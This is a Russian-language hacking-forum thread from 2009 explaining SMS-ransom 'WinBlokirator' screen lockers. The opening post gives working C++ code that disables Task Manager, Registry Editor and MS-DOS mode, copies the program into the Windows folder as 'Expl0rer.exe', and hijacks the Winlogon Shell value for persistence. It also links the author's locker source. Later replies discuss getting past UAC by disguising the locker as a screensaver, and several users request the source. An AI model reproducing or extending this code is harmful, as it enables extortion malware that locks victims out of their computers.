Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
WindowsBlock (теория в примерах) |
14.06.2009, 15:34
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме:
3718311
Репутация:
1118
|
|
WindowsBlock (теория в примерах)
Прелюдия
Тут один персонаж доставал меня по поводу «что такое «WinBlokirator» » и как оно работает.
Сразу оговорюсь, что статейка для опытных людей ничего нового не даст но вот для новичков в целях общего развития вполне подойдет.
И так, программы класса «WinBlokirator» можно отнести к вредоносным программам но как правило в ихнюю задачу входит только заставить пользователя отправить SMS на платный номер за что и обещают вернуть все на свои места (покрайне мере два варианта которые реверснул только это и делали).
Проникать на компьютер может любым из доступных способов и тут ничем не отличается от техже «KIDO», «Sality» а тоесть путем атаки на уязвимости в сервисах Windows (MS08-067,MS08-068,MS09-001), Интернет браузеров, склейка с исполняемыми файлами, а также через автозапуск съемных накопителей (Flash, CD,DVD и т.д.).
Проникая на компьютер жертвы «программа» (будем так называть) первым делом должна обеспечить себе безопасное пребывание и по максимуму усложнить возможность избавиться от нее не выполнив указанной просьбы (например, отправку SMS) - это достигается путем блокирования «Диспетчера задач», «Редактора реестра», «Загрузка в безопасном режиме/командной строки»
Вот пример возможного кода
(CodeGear C++Builder 2009)
Код:
// Запрещаем Редактирование реестра
reg = new TRegistry();
reg->RootKey=HKEY_CURRENT_USER;
reg->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",true);
reg->WriteInteger("DisableRegistryTools",1);
reg->CloseKey();
// Запрещаем Диспетчер задач
reg->RootKey=HKEY_CURRENT_USER;
reg->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",true);
reg->WriteInteger("DisableTaskMgr",1);
reg->CloseKey();
// Запрещаем Загрузку в режиме MS-DOS
reg->RootKey= HKEY_CURRENT_USER;
reg->OpenKey("Software\\ Microsoft\\ Windows\\ CurrentVersion\\ Policies\\WinOldApp",true);
reg->WriteInteger("NoRealMode",1);
reg->CloseKey();
Далее необходимо скопировать себя, куда нибудь в католог Windows – примерно следующим кодом:
Код:
ZeroMemory(CMD,500);
lstrcat(CMD,"cmd /c copy ");
lstrcat(CMD,Application->ExeName.t_str());
lstrcat(CMD," %WinDir%\\Expl0rer.exe"); //(Expl0rer.exe имя cс которым скопировать наш файл в каталог WINDOWS)
WinExec(CMD,0);
Чтобы при следующей загрузке Windows заблокировать компьютер нам необходимо заменить SHELL Windows (Explorer.exe) на свою программу, что делается путем изменения значения в ветке
Код:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Программная реализация:
Код:
reg->RootKey=HKEY_LOCAL_MACHINE;
reg->OpenKey("\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",true);
reg->WriteString("Shell","Expl0rer.exe"); //(Expl0rer.exe имя нашей программы в каталоге WINDOWS)
reg->CloseKey();
Теперь наша программа обеспечила себе возможность спокойно жить на компьютере и запуск при страте системы (путем подмены SHELL-a системы).
Реализация интерфейса
это уже дело вкуса каждого и ничего сложного в этом нет и логика работы простейшая:
1. Говорим что куда отправлять
2. Проверяем введенный код на корректность
3. Если корректно то возвращаем все на свои места в обратной последовательности.
Вот такая вот простая, в общем, технология, на которой умудряются зарабатывать деньги.
Вот несколько скринов программы, которая писалась специально для одной фирмы, которая не хотела покупать лицензионное ПО а Админ очень сильно волновался по этому поводу.
    
Она действовала по то муже принципу что и выше но только никаких кодов не просила =)
P.S. Фирма купила лицензии =)
Ну критикуйте меня.
Могу выложить исходники "блокиратора" со скринов - если модераторы не против. (код не супер красивый но вполне читабельный)
Вообщем исходник.
http://rapidshare.com/files/250975578/1.rar_.html
MD5: 40991CEE044C713F1D8E671B0FA6D1EF
Последний раз редактировалось POS_troi; 02.07.2009 в 12:46..
|
|
|
14.06.2009, 15:46
|
|
Участник форума
Регистрация: 07.07.2008
Сообщений: 161
Провел на форуме:
1027635
Репутация:
234
|
|
В каких версиях Windows работает? UAC помогает от этого или нет?
|
|
|
|
14.06.2009, 15:50
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме:
3718311
Репутация:
1118
|
|
На висте не тестировал (каюсь) когда меня попросили написать ЭТО то цель ставилась в направлении WINDOWS XP PRO SP3
|
|
|
|
15.06.2009, 12:45
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
Сообщение от POS_troi
На висте не тестировал (каюсь) когда меня попросили написать ЭТО то цель ставилась в направлении WINDOWS XP PRO SP3
В висте не позволит, пробовали на ноуте, фс стоит нтфс, в папку винды и в корень диска, во все системные папки + таск менеджер. Нужны права "супер админа"
|
|
|
|
15.06.2009, 18:29
|
|
Познавший АНТИЧАТ
Регистрация: 01.12.2006
Сообщений: 1,769
Провел на форуме:
3718311
Репутация:
1118
|
|
Можно пойти путем "СИ" например под скринсевер замаскировать и проверять при запуске права - если не Администратор то выдавать красивое окошко , мол "Извините но у вас не получиться установить наш супер красивый и клевый скрисевер без прав Администратора"
|
|
|
|
15.06.2009, 19:06
|
|
Moderator - Level 7
Регистрация: 12.07.2008
Сообщений: 1,705
Провел на форуме:
5914048
Репутация:
1350
|
|
Сообщение от gibson
В висте не позволит, пробовали на ноуте, фс стоит нтфс, в папку винды и в корень диска, во все системные папки + таск менеджер. Нужны права "супер админа"
Повашему в Xp в раздел HKLM и в %windir% может обычный пользователь писать?Так что это работает везде в независимости от ОС(xp,vista).В обоих случаях нужно права администратора и UAC ну ничем не попрепятствует.Что в xp потребуется runas,что в Vista запустится UAC.Если работать по умолчанию в виста под записью входящей в группу администраторы и не править настройки,то выведется уведомления о повышении прав,где достаточно нажать далее.
|
|
|
|
15.06.2009, 19:55
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
Повашему в Xp в раздел HKLM и в %windir% может обычный пользователь писать?
Я еще не видел, чтобы при установки винды (ХР) получался "обычный" пользователь. За это ХР и "любят" до сих пор, то что лишних вопросов не задает в отличии от висты и 7ки. Да и кто с этим будет возиться?
Если работать по умолчанию в виста под записью входящей в группу администраторы и не править настройки,то выведется уведомления о повышении прав,где достаточно нажать далее.
Под скрытую установку это не очень похоже. Мы тестировали несколько софтин, так что под ХР устанавливается на ура, в висте не проходит.
|
|
|
|
15.06.2009, 20:38
|
|
Познающий
Регистрация: 06.06.2009
Сообщений: 47
Провел на форуме:
437301
Репутация:
15
|
|
ТС, дай линк пожалуйста на исходники в личку буду благодарен.
|
|
|
|
15.06.2009, 20:42
|
|
Участник форума
Регистрация: 03.01.2009
Сообщений: 157
Провел на форуме:
759690
Репутация:
22
|
|
Сообщение от m03G
ТС, дай линк пожалуйста на исходники в личку буду благодарен.
и мне
|
|
|
|
15.06.2009, 20:45
|
|
Moderator - Level 7
Регистрация: 12.07.2008
Сообщений: 1,705
Провел на форуме:
5914048
Репутация:
1350
|
|
Сообщение от gibson
Я еще не видел, чтобы при установки винды (ХР) получался "обычный" пользователь. За это ХР и "любят" до сих пор, то что лишних вопросов не задает в отличии от висты и 7ки. Да и кто с этим будет возиться?
Под скрытую установку это не очень похоже. Мы тестировали несколько софтин, так что под ХР устанавливается на ура, в висте не проходит.
Пользователь тыкнет на 90% да при проявлении окна UAC,а в 99% попросит его отключить UAC ,заметит опытный пользователь который не когда не будет сидеть под записью администратора что в Xp ,что в Vista.А в 7 тем более там по умолчанию еще больше снижен UAC и отключается на раз,еще покрепче держится только самый высокий уровень.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
